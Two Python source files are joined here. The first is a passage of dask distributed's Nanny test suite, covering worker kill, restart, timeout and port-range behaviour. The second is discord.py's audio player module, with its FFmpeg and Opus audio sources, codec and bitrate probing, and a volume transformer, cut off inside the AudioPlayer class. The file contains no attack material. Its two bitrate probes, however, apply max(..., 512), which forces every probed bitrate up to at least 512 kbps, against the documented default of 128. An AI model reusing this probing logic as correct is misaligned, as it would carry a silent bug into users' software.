async with rpc(n.address) as nn:
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.kill()
assert not n.is_alive()
start = time()
while n.worker_address in s.workers:
assert time() < start + 1
await asyncio.sleep(0.01)
await nn.kill()
assert not n.is_alive()
assert n.worker_address not in s.workers
await nn.instantiate()
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.terminate()
assert not n.is_alive()
@gen_cluster(nthreads=[])
async def test_many_kills(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
assert n.is_alive()
await asyncio.gather(*(n.kill() for _ in range(5)))
await asyncio.gather(*(n.kill() for _ in range(5)))
await n.close()
@gen_cluster(Worker=Nanny)
async def test_str(s, a, b):
assert a.worker_address in str(a)
assert a.worker_address in repr(a)
assert str(a.nthreads) in str(a)
assert str(a.nthreads) in repr(a)
@gen_cluster(nthreads=[], timeout=20, client=True)
async def test_nanny_process_failure(c, s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
first_dir = n.worker_dir
assert os.path.exists(first_dir)
original_address = n.worker_address
ww = rpc(n.worker_address)
await ww.update_data(data=valmap(dumps, {"x": 1, "y": 2}))
pid = n.pid
assert pid is not None
with suppress(CommClosedError):
await c.run(os._exit, 0, workers=[n.worker_address])
start = time()
while n.pid == pid: # wait while process dies and comes back
await asyncio.sleep(0.01)
assert time() - start < 5
start = time()
await asyncio.sleep(1)
while not n.is_alive(): # wait while process comes back
await asyncio.sleep(0.01)
assert time() - start < 5
# assert n.worker_address != original_address # most likely
start = time()
while n.worker_address not in s.nthreads or n.worker_dir is None:
await asyncio.sleep(0.01)
assert time() - start < 5
second_dir = n.worker_dir
await n.close()
assert not os.path.exists(second_dir)
assert not os.path.exists(first_dir)
assert first_dir != n.worker_dir
await ww.close_rpc()
s.stop()
@gen_cluster(nthreads=[])
async def test_run(s):
pytest.importorskip("psutil")
n = await Nanny(s.address, nthreads=2, loop=s.loop)
with rpc(n.address) as nn:
response = await nn.run(function=dumps(lambda: 1))
assert response["status"] == "OK"
assert response["result"] == 1
await n.close()
@pytest.mark.slow
@gen_cluster(config={"distributed.comm.timeouts.connect": "1s"})
async def test_no_hang_when_scheduler_closes(s, a, b):
# https://github.com/dask/distributed/issues/2880
with captured_logger("tornado.application", logging.ERROR) as logger:
await s.close()
await asyncio.sleep(1.2)
assert a.status == "closed"
assert b.status == "closed"
out = logger.getvalue()
assert "Timed out trying to connect" not in out
@pytest.mark.slow
@gen_cluster(
Worker=Nanny, nthreads=[("127.0.0.1", 1)], worker_kwargs={"reconnect": False}
)
async def test_close_on_disconnect(s, w):
await s.close()
start = time()
while w.status != "closed":
await asyncio.sleep(0.05)
assert time() < start + 9
class Something(Worker):
# a subclass of Worker which is not Worker
pass
@gen_cluster(client=True, Worker=Nanny)
async def test_nanny_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Worker" in list(out.values())[0]
assert w1.Worker is Worker
@gen_cluster(client=True, Worker=Nanny, worker_kwargs={"worker_class": Something})
async def test_nanny_alt_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Something" in list(out.values())[0]
assert w1.Worker is Something
@pytest.mark.slow
@gen_cluster(client=False, nthreads=[])
async def test_nanny_death_timeout(s):
await s.close()
w = Nanny(s.address, death_timeout=1)
with pytest.raises(TimeoutError):
await w
assert w.status == "closed"
@gen_cluster(client=True, Worker=Nanny)
async def test_random_seed(c, s, a, b):
async def check_func(func):
x = c.submit(func, 0, 2 ** 31, pure=False, workers=a.worker_address)
y = c.submit(func, 0, 2 ** 31, pure=False, workers=b.worker_address)
assert x.key != y.key
x = await x
y = await y
assert x != y
await check_func(lambda a, b: random.randint(a, b))
await check_func(lambda a, b: np.random.randint(a, b))
@pytest.mark.skipif(
sys.platform.startswith("win"), reason="num_fds not supported on windows"
)
@gen_cluster(client=False, nthreads=[])
async def test_num_fds(s):
psutil = pytest.importorskip("psutil")
proc = psutil.Process()
# Warm up
w = await Nanny(s.address)
await w.close()
del w
gc.collect()
before = proc.num_fds()
for i in range(3):
w = await Nanny(s.address)
await asyncio.sleep(0.1)
await w.close()
start = time()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
await asyncio.sleep(0.1)
assert time() < start + 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(client=True, nthreads=[])
async def test_worker_uses_same_host_as_nanny(c, s):
for host in ["tcp://0.0.0.0", "tcp://127.0.0.2"]:
n = await Nanny(s.address, host=host)
def func(dask_worker):
return dask_worker.listener.listen_address
result = await c.run(func)
assert host in first(result.values())
await n.close()
@gen_test()
async def test_scheduler_file():
with tmpfile() as fn:
s = await Scheduler(scheduler_file=fn, port=8008)
w = await Nanny(scheduler_file=fn)
assert set(s.workers) == {w.worker_address}
await w.close()
s.stop()
@gen_cluster(client=True, Worker=Nanny, nthreads=[("127.0.0.1", 2)])
async def test_nanny_timeout(c, s, a):
x = await c.scatter(123)
with captured_logger(
logging.getLogger("distributed.nanny"), level=logging.ERROR
) as logger:
response = await a.restart(timeout=0.1)
out = logger.getvalue()
assert "timed out" in out.lower()
start = time()
while x.status != "cancelled":
await asyncio.sleep(0.1)
assert time() < start + 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": 1e8},
timeout=20,
clean_kwargs={"threads": False},
)
async def test_nanny_terminate(c, s, a):
from time import sleep
def leak():
L = []
while True:
L.append(b"0" * 5000000)
sleep(0.01)
proc = a.process.pid
with captured_logger(logging.getLogger("distributed.nanny")) as logger:
future = c.submit(leak)
start = time()
while a.process.pid == proc:
await asyncio.sleep(0.1)
assert time() < start + 10
out = logger.getvalue()
assert "restart" in out.lower()
assert "memory" in out.lower()
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 8,
client=True,
Worker=Worker,
clean_kwargs={"threads": False},
)
async def test_throttle_outgoing_connections(c, s, a, *workers):
    # Put a bunch of small data on worker a
await c.run(lambda: logging.getLogger("distributed.worker").setLevel(logging.DEBUG))
remote_data = c.map(
lambda x: b"0" * 10000, range(10), pure=False, workers=[a.address]
)
await wait(remote_data)
def pause(dask_worker):
# Patch paused and memory_monitor on the one worker
        # This is very fragile, since a refactor of memory_monitor to
# remove _memory_monitoring will break this test.
dask_worker._memory_monitoring = True
dask_worker.paused = True
dask_worker.outgoing_current_count = 2
await c.run(pause, workers=[a.address])
requests = [
await a.get_data(await w.rpc.connect(w.address), keys=[f.key], who=w.address)
for w in workers
for f in remote_data
]
await wait(requests)
wlogs = await c.get_worker_logs(workers=[a.address])
wlogs = "\n".join(x[1] for x in wlogs[a.address])
assert "throttling" in wlogs.lower()
@gen_cluster(nthreads=[], client=True)
async def test_avoid_memory_monitor_if_zero_limit(c, s):
nanny = await Nanny(s.address, loop=s.loop, memory_limit=0)
typ = await c.run(lambda dask_worker: type(dask_worker.data))
assert typ == {nanny.worker_address: dict}
pcs = await c.run(lambda dask_worker: list(dask_worker.periodic_callbacks))
assert "memory" not in pcs
assert "memory" not in nanny.periodic_callbacks
future = c.submit(inc, 1)
assert await future == 2
await asyncio.sleep(0.02)
await c.submit(inc, 2) # worker doesn't pause
await nanny.close()
@gen_cluster(nthreads=[], client=True)
async def test_scheduler_address_config(c, s):
with dask.config.set({"scheduler-address": s.address}):
nanny = await Nanny(loop=s.loop)
assert nanny.scheduler.address == s.address
start = time()
while not s.workers:
await asyncio.sleep(0.1)
assert time() < start + 10
await nanny.close()
@pytest.mark.slow
@gen_test(timeout=20)
async def test_wait_for_scheduler():
with captured_logger("distributed") as log:
w = Nanny("127.0.0.1:44737")
IOLoop.current().add_callback(w.start)
await asyncio.sleep(6)
await w.close()
log = log.getvalue()
assert "error" not in log.lower(), log
assert "restart" not in log.lower(), log
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable(c, s):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
b = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "456"})
await asyncio.gather(a, b)
results = await c.run(lambda: os.environ["FOO"])
assert results == {a.worker_address: "123", b.worker_address: "456"}
await asyncio.gather(a.close(), b.close())
@gen_cluster(nthreads=[], client=True)
async def test_data_types(c, s):
w = await Nanny(s.address, data=dict)
r = await c.run(lambda dask_worker: type(dask_worker.data))
assert r[w.worker_address] == dict
await w.close()
@gen_cluster(nthreads=[])
async def test_local_directory(s):
with tmpfile() as fn:
with dask.config.set(temporary_directory=fn):
w = await Nanny(s.address)
assert w.local_directory.startswith(fn)
assert "dask-worker-space" in w.local_directory
await w.close()
def _noop(x):
"""Define here because closures aren't pickleable."""
pass
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_process_worker_no_daemon(c, s, a):
def multiprocessing_worker():
p = mp.Process(target=_noop, args=(None,))
p.start()
p.join()
await c.submit(multiprocessing_worker)
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_pool_worker_no_daemon(c, s, a):
def pool_worker(world_size):
with mp.Pool(processes=world_size) as p:
p.map(_noop, range(world_size))
await c.submit(pool_worker, 4)
@pytest.mark.asyncio
async def test_nanny_closes_cleanly(cleanup):
async with Scheduler() as s:
n = await Nanny(s.address)
assert n.process.pid
proc = n.process.process
await n.close()
assert not n.process
assert not proc.is_alive()
assert proc.exitcode == 0
@pytest.mark.slow
@pytest.mark.asyncio
async def test_lifetime(cleanup):
counter = 0
event = asyncio.Event()
class Plugin(SchedulerPlugin):
def add_worker(self, **kwargs):
pass
def remove_worker(self, **kwargs):
nonlocal counter
counter += 1
if counter == 2: # wait twice, then trigger closing event
event.set()
async with Scheduler() as s:
s.add_plugin(Plugin())
async with Nanny(s.address) as a:
async with Nanny(s.address, lifetime="500 ms", lifetime_restart=True) as b:
await event.wait()
@pytest.mark.asyncio
async def test_nanny_closes_cleanly_2(cleanup):
async with Scheduler() as s:
async with Nanny(s.address) as n:
async with Client(s.address, asynchronous=True) as client:
with client.rpc(n.worker_address) as w:
IOLoop.current().add_callback(w.terminate)
start = time()
while n.status != "closed":
await asyncio.sleep(0.01)
assert time() < start + 5
assert n.status == "closed"
@pytest.mark.asyncio
async def test_config(cleanup):
async with Scheduler() as s:
async with Nanny(s.address, config={"foo": "bar"}) as n:
async with Client(s.address, asynchronous=True) as client:
config = await client.run(dask.config.get, "foo")
assert config[n.worker_address] == "bar"
@pytest.mark.asyncio
async def test_nanny_port_range(cleanup):
async with Scheduler() as s:
async with Client(s.address, asynchronous=True) as client:
nanny_port = "9867:9868"
worker_port = "9869:9870"
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n1:
assert n1.port == 9867 # Selects first port in range
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
) as n2:
assert n2.port == 9868 # Selects next port in range
with pytest.raises(
ValueError, match="Could not start Nanny"
): # No more ports left
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
):
pass
# Ensure Worker ports are in worker_port range
def get_worker_port(dask_worker):
return dask_worker.port
worker_ports = await client.run(get_worker_port)
assert list(worker_ports.values()) == parse_ports(worker_port)
class KeyboardInterruptWorker(worker.Worker):
"""A Worker that raises KeyboardInterrupt almost immediately"""
async def heartbeat(self):
def raise_err():
raise KeyboardInterrupt()
self.loop.add_callback(raise_err)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
@pytest.mark.asyncio
async def test_nanny_closed_by_keyboard_interrupt(cleanup, protocol):
if protocol == "ucx": # Skip if UCX isn't available
pytest.importorskip("ucp")
async with Scheduler(protocol=protocol) as s:
async with Nanny(
s.address, nthreads=1, worker_class=KeyboardInterruptWorker
) as n:
n.auto_restart = False
await n.process.stopped.wait()
# Check that the scheduler has been notified about the closed worker
assert len(s.workers) == 0
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from . import utils
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
if TYPE_CHECKING:
from .voice_client import VoiceClient
MISSING = utils.MISSING
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
        If the audio is complete, then return an empty
        :term:`py:bytes-like object` to signal this.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
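# Illustrative helper (not part of discord.py): the "about 3,840 bytes per
# frame" figure quoted above is just sample_rate * channels * bytes_per_sample
# * frame_duration for the documented 16-bit 48KHz stereo PCM format.
def _pcm_frame_size(sample_rate: int = 48000, channels: int = 2,
                    sample_width: int = 2, frame_ms: int = 20) -> int:
    return sample_rate * channels * sample_width * frame_ms // 1000  # 3840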
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
    Users creating AudioSources that use FFmpeg differently from how :class:`FFmpegPCMAudio` and
    :class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError(
"parameter conflict: 'source' parameter cannot be a string when piping to stdin"
)
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
        self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(
target=self._pipe_writer, args=(source,), daemon=True, name=n
)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(executable + " was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info("ffmpeg process %s has not terminated. Waiting to terminate...", proc.pid)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem", self, exc_info=True
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def check_streams(self) -> None:
if self._process is MISSING or self._stdout is MISSING or self._stdin is MISSING:
raise ValueError("FFmpegAudio cannot be read more than once")
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
# self.check_streams()
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
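# Illustrative sketch (not used by the library, file name hypothetical): for a
# plain file path the constructor above assembles an argument list roughly
# equivalent to the one returned here, i.e. raw signed 16-bit little-endian
# PCM at 48 kHz stereo written to stdout.
def _example_pcm_ffmpeg_args(source="song.mp3", executable="ffmpeg"):
    return [executable, "-i", source,
            "-f", "s16le", "-ar", "48000", "-ac", "2",
            "-loglevel", "warning", "pipe:1"]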
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, "_probe_codec_" + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError(
"Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'"
)
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
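        # "ffmpeg"[:2] + "probe" -> "ffprobe" and "avconv"[:2] + "probe" ->
        # "avprobe"; any other executable name is used as-is for probing.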
exe = executable[:2] + "probe" if executable in ("ffmpeg", "avconv") else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = utils._from_json(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
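# Minimal usage sketch (file name hypothetical, not part of the library):
# wrap a PCM source so its volume can be adjusted while it plays.
def _volume_transformer_example():
    source = PCMVolumeTransformer(FFmpegPCMAudio("song.mp3"), volume=0.5)
    source.volume = 1.5  # later raise to 150%; read() clamps the multiplier at 2.0
    return source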
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
